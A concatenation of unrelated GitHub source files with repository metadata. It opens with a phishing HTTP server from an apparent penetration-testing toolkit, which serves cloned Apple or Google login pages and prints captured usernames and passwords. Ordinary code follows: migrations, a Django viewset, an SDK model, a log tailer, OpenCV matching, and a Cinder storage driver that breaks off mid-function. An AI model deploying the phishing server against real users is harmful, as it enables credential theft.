elif path.endswith('.jpg') or path.endswith('.jpeg'):
content_type = 'image/jpeg'
elif path.endswith('.tif') or path.endswith('.tiff'):
content_type = 'image/tiff'
if path.endswith('.py'):
self.error_FileNotFound()
if path.endswith('.php'):
self.error_FileNotFound()
return content_type + '; charset=UTF-8'
# endregion
# region GET request
def do_GET(self):
try:
user_agent: Dict[str, str] = self.parse_user_agent(self.headers['User-Agent'])
self.check_host(self.headers['Host'])
if self.server.site_path.endswith(self.server.separator + 'apple') and user_agent['os'] == 'Mac OS X':
self.server.site_path += self.server.separator + 'macos_native'
full_path = self._get_full_path(path=self.path)
else:
full_path = self._get_full_path(path=self.path)
content_type = self._get_content_type(path=full_path)
if isfile(full_path):
response: bytes = open(full_path, 'rb').read()
self.send_response(200)
self.send_header('Content-Type', content_type)
self.send_header('Content-Length', str(len(response)))
self.send_header('Connection', 'close')
self.end_headers()
self.wfile.write(response)
else:
raise FileNotFoundError
except AttributeError:
self.error_BadRequest()
except FileNotFoundError:
self.error_FileNotFound()
except NameError:
self.redirect()
# endregion
# region POST request
def do_POST(self):
form: str = self.path
        if 'Content-Length' not in self.headers:
            self.error_NeedContentLength()
            return
try:
post_data: str = self.rfile.read(int(self.headers['Content-Length'])).decode('utf-8')
post_data: Dict = loads(post_data)
if form == '/check_username':
response: bytes = bytes(post_data['username'], 'utf-8')
self.send_response(200)
self.send_header('Content-Type', 'text/plain; charset=UTF-8')
self.send_header('Content-Length', str(len(response)))
self.send_header('Connection', 'close')
self.end_headers()
self.wfile.write(response)
elif form == '/check_credentials':
self.server.base.print_success('Phishing success!'
' Address: ', self.address_string(),
' Username: ', post_data['username'],
' Password: ', post_data['password'])
self.error_CheckCreds()
else:
self.error_FileNotFound()
except decoder.JSONDecodeError:
self.error_BadRequest()
except UnicodeDecodeError:
self.error_BadRequest()
except KeyError:
self.error_CheckCreds()
except UnboundLocalError:
self.error_CheckCreds()
# endregion
# region HEAD request
def do_HEAD(self):
try:
user_agent: Dict[str, str] = self.parse_user_agent(self.headers['User-Agent'])
self.check_host(self.headers['Host'])
full_path = self._get_full_path(path=self.path)
content_type = self._get_content_type(path=self.path)
if isfile(full_path):
self.send_response(200)
self.send_header('Content-Type', content_type)
self.send_header('Connection', 'close')
self.end_headers()
else:
raise FileNotFoundError
except AttributeError:
self.send_response(400)
self.send_header('Content-Type', 'text/html')
self.send_header('Connection', 'close')
self.end_headers()
except FileNotFoundError:
self.send_response(404)
self.send_header('Content-Type', 'text/html')
self.send_header('Connection', 'close')
self.end_headers()
except NameError:
self.send_response(302)
self.send_header('Location', 'http://' + self.server.site_domain + '/')
self.send_header('Connection', 'close')
self.end_headers()
# endregion
# region Log messages
def log_message(self, format, *args):
if not self.server.quiet:
user_agent = self.headers['User-Agent']
host = self.headers['Host']
if host is None:
host = 'None'
if user_agent is None:
user_agent = 'None'
parsed_user_agent = self.parse_user_agent(user_agent)
self.server.base.print_info('Phishing client address: ', self.address_string(),
' os: ', parsed_user_agent['os'],
' browser: ', parsed_user_agent['browser'],
' host: ', host, ' request: ', '%s' % format % args)
# endregion
# endregion
# region Phishing HTTP Server IPv4
class _PhishingHTTPServerIPv4(HTTPServer):
def __init__(self,
server_address: Tuple[str, int],
RequestHandlerClass: Callable[..., BaseHTTPRequestHandler],
base_instance: Base,
site_path: str,
site_domain: Union[None, str] = None,
quiet: bool = False):
super().__init__(server_address, RequestHandlerClass)
self.site_path: str = site_path
self.site_domain: str = site_domain
self.base: Base = base_instance
self.quiet: bool = quiet
if self.base.get_platform().startswith('Windows'):
self.separator: str = '\\'
else:
self.separator: str = '/'
# endregion
# region Phishing HTTP Server IPv6
class _PhishingHTTPServerIPv6(HTTPServer):
address_family = AF_INET6
def __init__(self,
server_address: Tuple[str, int],
RequestHandlerClass: Callable[..., BaseHTTPRequestHandler],
base_instance: Base,
site_path: str,
site_domain: Union[None, str] = None,
quiet: bool = False):
super().__init__(server_address, RequestHandlerClass)
self.site_path: str = site_path
self.site_domain: str = site_domain
self.base: Base = base_instance
self.quiet: bool = quiet
if self.base.get_platform().startswith('Windows'):
self.separator: str = '\\'
else:
self.separator: str = '/'
# endregion
# region Multi Threaded Phishing Server IPv4
class _MultiThreadedPhishingServerIPv4(ThreadingMixIn, _PhishingHTTPServerIPv4):
"""
Handle requests in a separate thread.
"""
# endregion
# region Multi Threaded Phishing Server IPv6
class _MultiThreadedPhishingServerIPv6(ThreadingMixIn, _PhishingHTTPServerIPv6):
"""
Handle requests in a separate thread.
"""
# endregion
# region class Phishing Server
class PhishingServer:
"""
Phishing HTTP server (phishing)
"""
# region Variables
_base: Base = Base(admin_only=True, available_platforms=['Linux', 'Darwin', 'Windows'])
# endregion
# region Start Phishing
def start(self,
address: str = '0.0.0.0',
port: int = 80,
site: str = 'apple',
redirect: str = 'authentication.net',
quiet: bool = False):
"""
Start Phishing HTTP server
:param address: IPv4 address for listening (default: '0.0.0.0')
:param port: TCP port for listening (default: 80)
:param site: Set full path to site or phishing site template 'apple' or 'google' (default: 'apple')
:param redirect: Set phishing site domain for redirect (default: 'authentication.net')
:param quiet: Quiet mode
:return: None
"""
if '::' in address:
self._base.print_info('Wait IPv6 HTTP requests ...')
else:
self._base.print_info('Wait IPv4 HTTP requests ...')
phishing: Union[None, _MultiThreadedPhishingServerIPv4, _MultiThreadedPhishingServerIPv6] = None
try:
if self._base.get_platform().startswith('Windows'):
separator: str = '\\'
else:
separator: str = '/'
if separator in site:
site_path = site
assert isdir(site_path), \
                'Could not find site path: ' + self._base.error_text(site_path)
else:
directories: List[str] = list()
current_path: str = dirname(abspath(__file__))
files: List[str] = listdir(current_path)
for file in files:
path: str = join(current_path + separator + file)
if isdir(path):
directories.append(path)
site_path: str = join(current_path + separator + site)
assert site_path in directories, \
                'Could not find site template: ' + self._base.error_text(site) + \
' in templates directory: ' + self._base.info_text(current_path)
if '::' in address:
phishing = \
_MultiThreadedPhishingServerIPv6(server_address=(address, port),
RequestHandlerClass=_PhishingHTTPRequestHandler,
base_instance=self._base,
site_path=site_path,
site_domain=redirect,
quiet=quiet)
else:
phishing = \
_MultiThreadedPhishingServerIPv4(server_address=(address, port),
RequestHandlerClass=_PhishingHTTPRequestHandler,
base_instance=self._base,
site_path=site_path,
site_domain=redirect,
quiet=quiet)
phishing.serve_forever()
except OSError:
if not quiet:
self._base.print_error('Port: ', str(port), ' already listen!')
exit(1)
except KeyboardInterrupt:
if phishing is not None:
phishing.server_close()
if not quiet:
self._base.print_info('Exit')
exit(0)
except AssertionError as Error:
if phishing is not None:
phishing.server_close()
if not quiet:
self._base.print_error(Error.args[0])
exit(1)
# endregion
# endregion
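# Usage sketch (illustrative arguments, mirroring the defaults documented in
# start()); binding port 80 normally requires elevated privileges.
#   PhishingServer().start(address='0.0.0.0', port=80, site='apple',
#                          redirect='authentication.net', quiet=False)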
|
{
"content_hash": "b9902aa81bdeb1fa24542fc519bb82c1",
"timestamp": "",
"source": "github",
"line_count": 448,
"max_line_length": 114,
"avg_line_length": 38.145089285714285,
"alnum_prop": 0.5471941014687811,
"repo_name": "Vladimir-Ivanov-Git/raw-packet",
"id": "347a2556c3135a2b027ebd856872f17d5a5fb46a",
"size": "17110",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "raw_packet/Servers/Phishing/phishing.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Python",
"bytes": "2527277"
},
{
"name": "Shell",
"bytes": "189"
}
],
"symlink_target": ""
}
|
"""empty message
Revision ID: 3088dcf95e92
Revises: 0a0bf059f762
Create Date: 2017-02-25 21:24:25.752377
"""
# revision identifiers, used by Alembic.
revision = '3088dcf95e92'
down_revision = '0a0bf059f762'
from alembic import op
import sqlalchemy as sa
def upgrade():
### commands auto generated by Alembic - please adjust! ###
op.add_column('pending_ride', sa.Column('external_ride_id', sa.String(), nullable=True))
### end Alembic commands ###
def downgrade():
### commands auto generated by Alembic - please adjust! ###
op.drop_column('pending_ride', 'external_ride_id')
### end Alembic commands ###
|
{
"content_hash": "d67c3a0052669a251c9fa62b1b35c5d1",
"timestamp": "",
"source": "github",
"line_count": 26,
"max_line_length": 92,
"avg_line_length": 24.46153846153846,
"alnum_prop": 0.6933962264150944,
"repo_name": "whittlbc/jarvis",
"id": "03b1c0ac73f4189a3907a2c9dfa9529efab7eb1f",
"size": "636",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "migrations/versions/3088dcf95e92_.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "HTML",
"bytes": "3356"
},
{
"name": "Mako",
"bytes": "412"
},
{
"name": "Python",
"bytes": "273630"
},
{
"name": "Ruby",
"bytes": "2963"
}
],
"symlink_target": ""
}
|
from __future__ import absolute_import
from pyarrow.lib import benchmark_PandasObjectIsNull
|
{
"content_hash": "8b8be787b61fb52f7fbcf4e4b1c81f8a",
"timestamp": "",
"source": "github",
"line_count": 3,
"max_line_length": 52,
"avg_line_length": 31,
"alnum_prop": 0.8279569892473119,
"repo_name": "renesugar/arrow",
"id": "e8e38a42f4cabc8de2a71098f05ae52ee3c56473",
"size": "895",
"binary": false,
"copies": "2",
"ref": "refs/heads/master",
"path": "python/pyarrow/benchmark.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "Assembly",
"bytes": "73655"
},
{
"name": "Awk",
"bytes": "3683"
},
{
"name": "Batchfile",
"bytes": "34928"
},
{
"name": "C",
"bytes": "428011"
},
{
"name": "C#",
"bytes": "517100"
},
{
"name": "C++",
"bytes": "10120156"
},
{
"name": "CMake",
"bytes": "450430"
},
{
"name": "Dockerfile",
"bytes": "54234"
},
{
"name": "Emacs Lisp",
"bytes": "1825"
},
{
"name": "FreeMarker",
"bytes": "2271"
},
{
"name": "Go",
"bytes": "838776"
},
{
"name": "HTML",
"bytes": "3427"
},
{
"name": "Java",
"bytes": "3527648"
},
{
"name": "JavaScript",
"bytes": "102332"
},
{
"name": "Lua",
"bytes": "8771"
},
{
"name": "M4",
"bytes": "9093"
},
{
"name": "MATLAB",
"bytes": "36600"
},
{
"name": "Makefile",
"bytes": "49970"
},
{
"name": "Meson",
"bytes": "39653"
},
{
"name": "Objective-C",
"bytes": "12125"
},
{
"name": "PLpgSQL",
"bytes": "56995"
},
{
"name": "Perl",
"bytes": "3799"
},
{
"name": "Python",
"bytes": "2152367"
},
{
"name": "R",
"bytes": "272554"
},
{
"name": "Ruby",
"bytes": "862884"
},
{
"name": "Rust",
"bytes": "2208433"
},
{
"name": "Shell",
"bytes": "376434"
},
{
"name": "TSQL",
"bytes": "29787"
},
{
"name": "Thrift",
"bytes": "138360"
},
{
"name": "TypeScript",
"bytes": "1157378"
}
],
"symlink_target": ""
}
|
class ScrapyGlancePipeline(object):
def process_item(self, item, spider):
return item
|
{
"content_hash": "26a2487b359a792e21b6535eb23c45cb",
"timestamp": "",
"source": "github",
"line_count": 3,
"max_line_length": 41,
"avg_line_length": 32.666666666666664,
"alnum_prop": 0.7040816326530612,
"repo_name": "tgl-dogg/BCC-2s14-PI4-SteampunkSpider",
"id": "b3e83be99a374eb36a1febebbf567e920806a912",
"size": "292",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "src/steampunk_spider/crawler/pipelines.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Python",
"bytes": "65463"
}
],
"symlink_target": ""
}
|
from rest_framework import permissions, viewsets, status
from rest_framework.response import Response
from .models import Account
from .permissions import IsAccountOwner
from .serializers import AccountSerializer
class AccountViewSet(viewsets.ModelViewSet):
lookup_field = 'username'
queryset = Account.objects.all()
serializer_class = AccountSerializer
def get_permissions(self):
if self.request.method in permissions.SAFE_METHODS:
return permissions.AllowAny(),
if self.request.method == 'POST':
return permissions.AllowAny(),
return permissions.IsAuthenticated(), IsAccountOwner()
def create(self, request):
serializer = self.serializer_class(data=request.data)
if serializer.is_valid():
Account.objects.create_user(**serializer.validated_data)
return Response(serializer.validated_data, status=status.HTTP_201_CREATED)
return Response({
'status': 'Bad request', 'message': 'Account could not be created with received data'
}, status=status.HTTP_400_BAD_REQUEST)
|
{
"content_hash": "4cee8a821d8aac538a22941d6db11b3c",
"timestamp": "",
"source": "github",
"line_count": 33,
"max_line_length": 97,
"avg_line_length": 33.666666666666664,
"alnum_prop": 0.7020702070207021,
"repo_name": "quaest-io/quaest-io",
"id": "29a368776fabc818ed5d8fed83732bfdb1cf7ef2",
"size": "1111",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "quaestio/authentication/views.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "CSS",
"bytes": "104"
},
{
"name": "HTML",
"bytes": "5997"
},
{
"name": "JavaScript",
"bytes": "4243"
},
{
"name": "Python",
"bytes": "20817"
},
{
"name": "Shell",
"bytes": "84"
}
],
"symlink_target": ""
}
|
from msrest.serialization import Model
class ContainerServiceCredentials(Model):
"""Information about the Azure Container Registry which contains the images
deployed to the cluster.
Variables are only populated by the server, and will be ignored when
sending a request.
:ivar acs_kube_config: The ACS kube config file.
:vartype acs_kube_config: str
:ivar service_principal_configuration: Service principal configuration
used by Kubernetes.
:vartype service_principal_configuration:
~azure.mgmt.machinelearningcompute.models.ServicePrincipalProperties
:ivar image_pull_secret_name: The ACR image pull secret name which was
created in Kubernetes.
:vartype image_pull_secret_name: str
"""
_validation = {
'acs_kube_config': {'readonly': True},
'service_principal_configuration': {'readonly': True},
'image_pull_secret_name': {'readonly': True},
}
_attribute_map = {
'acs_kube_config': {'key': 'acsKubeConfig', 'type': 'str'},
'service_principal_configuration': {'key': 'servicePrincipalConfiguration', 'type': 'ServicePrincipalProperties'},
'image_pull_secret_name': {'key': 'imagePullSecretName', 'type': 'str'},
}
def __init__(self):
super(ContainerServiceCredentials, self).__init__()
self.acs_kube_config = None
self.service_principal_configuration = None
self.image_pull_secret_name = None
|
{
"content_hash": "4e9da01717738e600de2e02d42dbb33f",
"timestamp": "",
"source": "github",
"line_count": 38,
"max_line_length": 122,
"avg_line_length": 38.36842105263158,
"alnum_prop": 0.6831275720164609,
"repo_name": "lmazuel/azure-sdk-for-python",
"id": "17a92a26e1f2299973c9d6f85b460014db41fcba",
"size": "1932",
"binary": false,
"copies": "2",
"ref": "refs/heads/master",
"path": "azure-mgmt-machinelearningcompute/azure/mgmt/machinelearningcompute/models/container_service_credentials.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Python",
"bytes": "42572767"
}
],
"symlink_target": ""
}
|
import logging
from eventkit_cloud.utils.services.errors import MissingLayerError, UnsupportedFormatError, ServiceError
from eventkit_cloud.utils.services.ows import OWS
logger = logging.getLogger(__name__)
class WMS(OWS):
def __init__(self, *args, **kwargs):
super(WMS, self).__init__(*args, **kwargs)
self.query["SERVICE"] = "WMS"
# 1.3.0 will work as well, if that's returned. 1.0.0 isn't widely supported.
self.query["VERSION"] = "1.1.1"
def find_layer(self, root):
"""
        :param root: Root XML element of the WMS capabilities document
        :return: XML 'Layer' element for the requested layer (raises MissingLayerError if absent)
"""
capability = root.find(".//capability")
if capability is None:
raise UnsupportedFormatError()
# Flatten nested layers to single list
layers = capability.findall("layer")
sublayers = layers
while len(sublayers) > 0:
sublayers = [layer for layer in sublayers for layer in layer.findall("layer")]
layers.extend(sublayers)
# Get layer names
layer_names = [(layer, layer.find("name")) for layer in layers]
logger.debug("WMS layers offered: {}".format([name.text for layer, name in layer_names if name]))
requested_layer = self.get_layer_name()
layer = [layer for layer, name in layer_names if name is not None and requested_layer == name.text]
if not layer:
raise MissingLayerError(
f"Unable to find requested WMS layer '{requested_layer}'"
f" in layer list: {' '.join(str(ln.text) for ln in layer_names)}"
)
layer = layer[0]
return layer
def get_bbox(self, element):
bbox_element = element.find("latlonboundingbox")
if bbox_element is not None:
bbox = [float(bbox_element.attrib[point]) for point in ["minx", "miny", "maxx", "maxy"]]
return bbox
bbox_element = element.find("ex_geographicboundingbox")
if bbox_element is not None:
points = ["westboundlongitude", "southboundlatitude", "eastboundlongitude", "northboundlatitude"]
bbox = [float(bbox_element.findtext(point)) for point in points]
return bbox
def get_layer_name(self):
try:
layer_name = (
self.config.get("sources", {})
.get("default", {})
.get("req", {})
.get("layers") # TODO: Can there be more than one layer name in the WMS/WMTS config?
)
except AttributeError:
logger.error("Unable to get layer name from provider configuration.")
logger.info(self.config)
raise ServiceError()
if layer_name is None:
raise MissingLayerError("Unable to find WMS layer, no layer name found in config")
layer_name = str(layer_name).lower()
return layer_name
|
{
"content_hash": "53e2e4d9021099edfd118245a5c0c8b0",
"timestamp": "",
"source": "github",
"line_count": 78,
"max_line_length": 109,
"avg_line_length": 38.62820512820513,
"alnum_prop": 0.5784931961500166,
"repo_name": "venicegeo/eventkit-cloud",
"id": "145f7e26808f71436d6d7137926ab29d63b163fc",
"size": "3013",
"binary": false,
"copies": "2",
"ref": "refs/heads/master",
"path": "eventkit_cloud/utils/services/wms.py",
"mode": "33188",
"license": "bsd-3-clause",
"language": [
{
"name": "CSS",
"bytes": "90420"
},
{
"name": "Dockerfile",
"bytes": "2466"
},
{
"name": "HTML",
"bytes": "85741"
},
{
"name": "Java",
"bytes": "123740"
},
{
"name": "JavaScript",
"bytes": "597810"
},
{
"name": "Python",
"bytes": "1145801"
},
{
"name": "Shell",
"bytes": "6127"
},
{
"name": "TypeScript",
"bytes": "1456680"
}
],
"symlink_target": ""
}
|
__author__ = 'vialette'
class ItemEvent(object):
REQUEST_ADD_ITEM = 0
START_ADD_ITEM = 1
END_ADD_ITEM = 2
def __init__(self, event_type, timestamp, item):
self._event_type = event_type
self._timestamp = timestamp
self._item = item
@property
def event_type(self):
"""Return the asociated item event type code.
"""
return self._event_type
@property
def timestamp(self):
"""Return the associated timestamp.
"""
return self._timestamp
@property
def item(self):
"""Return the associated item.
"""
return self._item
def event_type_str(self):
"""Stringify the item event type of this item event.
"""
if self.event_type == ItemEvent.REQUEST_ADD_ITEM:
return "REQUEST_ADD_ITEM"
elif self.event_type == ItemEvent.START_ADD_ITEM:
return "START_ADD_ITEM"
elif self.event_type == ItemEvent.END_ADD_ITEM:
return "END_ADD_ITEM"
else:
raise ValueError("bad event type code {}".format(self.event_type))
def __str__(self):
"""Stringify this item event.
"""
return "event_type={} timestamp={} item={}".format(self.event_type_str(), self.timestamp, self.item)
|
{
"content_hash": "cf2754d7dd2d1ff3adfffa468d904286",
"timestamp": "",
"source": "github",
"line_count": 48,
"max_line_length": 108,
"avg_line_length": 27.333333333333332,
"alnum_prop": 0.5708841463414634,
"repo_name": "vialette/ultrastorage",
"id": "c151f07c0a632ddbc1cf5c424053d1d0701867b7",
"size": "1312",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "ultrastorage/itemevent/itemevent.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Jupyter Notebook",
"bytes": "66502"
},
{
"name": "Python",
"bytes": "110031"
}
],
"symlink_target": ""
}
|
import binascii
import os
from stat import ST_INO, ST_SIZE
class TailFile(object):
CRC_SIZE = 16
def __init__(self, logger, path, callback):
self._path = path
self._f = None
self._inode = None
self._size = 0
self._crc = None
self._log = logger
self._callback = callback
def _open_file(self, move_end=False, pos=False):
already_open = False
# close and reopen to handle logrotate
if self._f is not None:
self._f.close()
self._f = None
already_open = True
stat = os.stat(self._path)
inode = stat[ST_INO]
size = stat[ST_SIZE]
# Compute CRC of the beginning of the file
crc = None
if size >= self.CRC_SIZE:
tmp_file = open(self._path, 'r')
data = tmp_file.read(self.CRC_SIZE)
crc = binascii.crc32(data)
if already_open:
# Check if file has been removed
if self._inode is not None and inode != self._inode:
self._log.debug("File removed, reopening")
move_end = False
pos = False
# Check if file has been truncated
elif self._size > 0 and size < self._size:
self._log.debug("File truncated, reopening")
move_end = False
pos = False
# Check if file has been truncated and too much data has
            # already been written (copytruncate and opened files...)
if size >= self.CRC_SIZE and self._crc is not None and crc != self._crc:
self._log.debug("Begining of file modified, reopening")
move_end = False
pos = False
self._inode = inode
self._size = size
self._crc = crc
self._f = open(self._path, 'r')
if move_end:
self._log.debug("Opening file %s" % (self._path))
self._f.seek(0, os.SEEK_END)
elif pos:
self._log.debug("Reopening file %s at %s" % (self._path, pos))
self._f.seek(pos)
return True
def tail(self, line_by_line=True, move_end=True):
"""Read line-by-line and run callback on each line.
line_by_line: yield each time a callback has returned True
move_end: start from the last line of the log"""
try:
self._open_file(move_end=move_end)
while True:
pos = self._f.tell()
line = self._f.readline()
if line:
                    line = line.strip(chr(0)) # a truncate may have created holes in the file
if self._callback(line.rstrip("\n")):
if line_by_line:
yield True
pos = self._f.tell()
self._open_file(move_end=False, pos=pos)
else:
continue
else:
continue
else:
yield True
assert pos == self._f.tell()
self._open_file(move_end=False, pos=pos)
except Exception as e:
# log but survive
self._log.exception(e)
raise StopIteration(e)
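# Usage sketch (illustrative logger, path and callback): tail() is a generator
# driven by iteration; each yield corresponds to a callback that returned True.
#   import logging
#   def handle_line(line):
#       logging.getLogger(__name__).info(line)
#       return True
#   tailer = TailFile(logging.getLogger(__name__), "/var/log/example.log", handle_line)
#   for _ in tailer.tail(line_by_line=True, move_end=True):
#       pass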
|
{
"content_hash": "69bdd9742eea19374d649901c238578a",
"timestamp": "",
"source": "github",
"line_count": 102,
"max_line_length": 93,
"avg_line_length": 32.78431372549019,
"alnum_prop": 0.4880382775119617,
"repo_name": "indeedops/dd-agent",
"id": "ed9abdd9b9c64a75fe045d6e8a26cfa2013250f7",
"size": "3451",
"binary": false,
"copies": "11",
"ref": "refs/heads/master",
"path": "utils/tailfile.py",
"mode": "33188",
"license": "bsd-3-clause",
"language": [
{
"name": "ApacheConf",
"bytes": "2717"
},
{
"name": "Go",
"bytes": "2389"
},
{
"name": "HTML",
"bytes": "8553"
},
{
"name": "Nginx",
"bytes": "3908"
},
{
"name": "PowerShell",
"bytes": "2665"
},
{
"name": "Python",
"bytes": "2300561"
},
{
"name": "Ruby",
"bytes": "102896"
},
{
"name": "Shell",
"bytes": "61965"
},
{
"name": "XSLT",
"bytes": "2222"
}
],
"symlink_target": ""
}
|
def human_layout_to_computer(human_layout):
computer_layout = {}
for row_num, row in enumerate(human_layout):
for col_num, char in enumerate(row):
computer_layout[char] = {
'x': col_num,
'y': row_num
}
return computer_layout
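# Usage sketch (illustrative layout): each character maps to its column (x)
# and row (y) within the human-readable layout.
#   layout = human_layout_to_computer(["qwe", "asd"])
#   layout["q"]   # {'x': 0, 'y': 0}
#   layout["d"]   # {'x': 2, 'y': 1}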
|
{
"content_hash": "67db0b2facb27d4f24ee6b204c93203c",
"timestamp": "",
"source": "github",
"line_count": 9,
"max_line_length": 48,
"avg_line_length": 33.333333333333336,
"alnum_prop": 0.54,
"repo_name": "hbaughman/softKey",
"id": "c3279d8cac4b48a38744209ee87e5e3a99e55ca1",
"size": "300",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "calc_char_positions.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Python",
"bytes": "8818"
}
],
"symlink_target": ""
}
|
import cv2
import numpy as np
import matplotlib.pyplot as plt
def referTemplate(iFrame, threshold):
img_gray = cv2.cvtColor(iFrame, cv2.COLOR_BGR2GRAY)
template = cv2.imread('train.jpg',0)
w, h = template.shape[::-1]
res = cv2.matchTemplate(img_gray,template,cv2.TM_CCOEFF_NORMED)
loc = np.where( res >= threshold)
for pt in zip(*loc[::-1]):
cv2.rectangle(iFrame, pt, (pt[0] + w, pt[1] + h), (0,255,255), 2)
return iFrame
def bruteForceMatcher(iFrame):
img1 = cv2.imread('train.jpg',0)
orb = cv2.ORB_create()
kp1, des1 = orb.detectAndCompute(img1,None)
kp2, des2 = orb.detectAndCompute(iFrame,None)
bf = cv2.BFMatcher(cv2.NORM_HAMMING, crossCheck=False)
    try:
        matches = bf.match(des1,des2)
        matches = sorted(matches, key = lambda x:x.distance)
    except cv2.error as e:
        # matching can fail (e.g. no descriptors detected); fall back to no matches
        print "No or Improbable Match Found"
        matches = []
img3 = cv2.drawMatches(img1,kp1,iFrame,kp2,matches[:10],None, flags=2)
#plt.imshow(img3)
#plt.show()
return img3
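# Usage sketch (illustrative file name and threshold): both helpers expect a
# BGR frame such as one returned by cv2.imread() or cv2.VideoCapture.read(),
# and assume 'train.jpg' exists alongside this script.
#   frame = cv2.imread('query.jpg')
#   boxed = referTemplate(frame, 0.8)
#   matched = bruteForceMatcher(frame)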
|
{
"content_hash": "23a6203f8d5b579a6f4e23882fc003fe",
"timestamp": "",
"source": "github",
"line_count": 44,
"max_line_length": 74,
"avg_line_length": 24.136363636363637,
"alnum_prop": 0.6393596986817326,
"repo_name": "Gobind03/Gesture-Recognition",
"id": "a8a961e11622e6c2182a3f9a825de3a08f385c21",
"size": "1062",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "Python-Implementation/ObjectRecognition.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "C++",
"bytes": "7087"
},
{
"name": "Python",
"bytes": "2189"
}
],
"symlink_target": ""
}
|
{
'name': 'Initial Setup Tools',
'version': '1.0',
'category': 'Hidden',
'description': """
This module helps to configure the system at the installation of a new database.
================================================================================
Shows you a list of applications features to install from.
""",
'author': 'OpenERP SA',
'website': 'http://www.openerp.com',
'depends': ['base', 'web_kanban'],
'data': [
'security/ir.model.access.csv',
'base_setup_views.xml',
'res_config_view.xml',
'res_partner_view.xml',
],
'demo': [],
'installable': True,
'auto_install': False,
'images': ['images/base_setup1.jpeg','images/base_setup2.jpeg','images/base_setup3.jpeg','images/base_setup4.jpeg',],
'css': ['static/src/css/base_setup.css'],
}
# vim:expandtab:smartindent:tabstop=4:softtabstop=4:shiftwidth=4:
|
{
"content_hash": "1a668694b583ef8528c8d40a48bbb1ee",
"timestamp": "",
"source": "github",
"line_count": 27,
"max_line_length": 121,
"avg_line_length": 33.629629629629626,
"alnum_prop": 0.5594713656387665,
"repo_name": "ntiufalara/openerp7",
"id": "e74238ba59cc20dede38715a28adcd20edad754d",
"size": "1888",
"binary": false,
"copies": "61",
"ref": "refs/heads/master",
"path": "openerp/addons/base_setup/__openerp__.py",
"mode": "33261",
"license": "mit",
"language": [
{
"name": "Batchfile",
"bytes": "9611"
},
{
"name": "C#",
"bytes": "93691"
},
{
"name": "C++",
"bytes": "108790"
},
{
"name": "CSS",
"bytes": "583265"
},
{
"name": "Groff",
"bytes": "8138"
},
{
"name": "HTML",
"bytes": "125159"
},
{
"name": "JavaScript",
"bytes": "5109152"
},
{
"name": "Makefile",
"bytes": "14036"
},
{
"name": "NSIS",
"bytes": "14114"
},
{
"name": "PHP",
"bytes": "14033"
},
{
"name": "Python",
"bytes": "9373763"
},
{
"name": "Ruby",
"bytes": "220"
},
{
"name": "Shell",
"bytes": "6430"
},
{
"name": "XSLT",
"bytes": "156761"
}
],
"symlink_target": ""
}
|
import os
import re
from oslo.config import cfg
from cinder.brick.remotefs import remotefs
from cinder import exception
from cinder.i18n import _
from cinder.image import image_utils
from cinder.openstack.common import log as logging
from cinder.openstack.common import processutils as putils
from cinder.openstack.common import units
from cinder import utils
from cinder.volume.drivers import remotefs as remotefs_drv
VERSION = '1.0.0'
LOG = logging.getLogger(__name__)
volume_opts = [
cfg.StrOpt('smbfs_shares_config',
default='/etc/cinder/smbfs_shares',
help='File with the list of available smbfs shares.'),
cfg.StrOpt('smbfs_default_volume_format',
default='qcow2',
help=('Default format that will be used when creating volumes '
'if no volume format is specified. Can be set to: '
'raw, qcow2, vhd or vhdx.')),
cfg.BoolOpt('smbfs_sparsed_volumes',
default=True,
help=('Create volumes as sparsed files which take no space '
'rather than regular files when using raw format, '
'in which case volume creation takes lot of time.')),
cfg.FloatOpt('smbfs_used_ratio',
default=0.95,
help=('Percent of ACTUAL usage of the underlying volume '
'before no new volumes can be allocated to the volume '
'destination.')),
cfg.FloatOpt('smbfs_oversub_ratio',
default=1.0,
help=('This will compare the allocated to available space on '
'the volume destination. If the ratio exceeds this '
'number, the destination will no longer be valid.')),
cfg.StrOpt('smbfs_mount_point_base',
default='$state_path/mnt',
help=('Base dir containing mount points for smbfs shares.')),
cfg.StrOpt('smbfs_mount_options',
default='noperm,file_mode=0775,dir_mode=0775',
help=('Mount options passed to the smbfs client. See '
'mount.cifs man page for details.')),
]
CONF = cfg.CONF
CONF.register_opts(volume_opts)
class SmbfsDriver(remotefs_drv.RemoteFSSnapDriver):
"""SMBFS based cinder volume driver.
"""
driver_volume_type = 'smbfs'
driver_prefix = 'smbfs'
volume_backend_name = 'Generic_SMBFS'
SHARE_FORMAT_REGEX = r'//.+/.+'
VERSION = VERSION
_DISK_FORMAT_VHD = 'vhd'
_DISK_FORMAT_VHD_LEGACY = 'vpc'
_DISK_FORMAT_VHDX = 'vhdx'
_DISK_FORMAT_RAW = 'raw'
_DISK_FORMAT_QCOW2 = 'qcow2'
def __init__(self, execute=putils.execute, *args, **kwargs):
self._remotefsclient = None
super(SmbfsDriver, self).__init__(*args, **kwargs)
self.configuration.append_config_values(volume_opts)
root_helper = utils.get_root_helper()
self.base = getattr(self.configuration,
'smbfs_mount_point_base')
opts = getattr(self.configuration,
'smbfs_mount_options')
self._remotefsclient = remotefs.RemoteFsClient(
'cifs', root_helper, execute=execute,
smbfs_mount_point_base=self.base,
smbfs_mount_options=opts)
self.img_suffix = None
def _qemu_img_info(self, path, volume_name):
return super(SmbfsDriver, self)._qemu_img_info_base(
path, volume_name, self.configuration.smbfs_mount_point_base)
def initialize_connection(self, volume, connector):
"""Allow connection to connector and return connection info.
:param volume: volume reference
:param connector: connector reference
"""
# Find active image
active_file = self.get_active_image_from_info(volume)
active_file_path = os.path.join(self._local_volume_dir(volume),
active_file)
info = self._qemu_img_info(active_file_path, volume['name'])
fmt = info.file_format
data = {'export': volume['provider_location'],
'format': fmt,
'name': active_file}
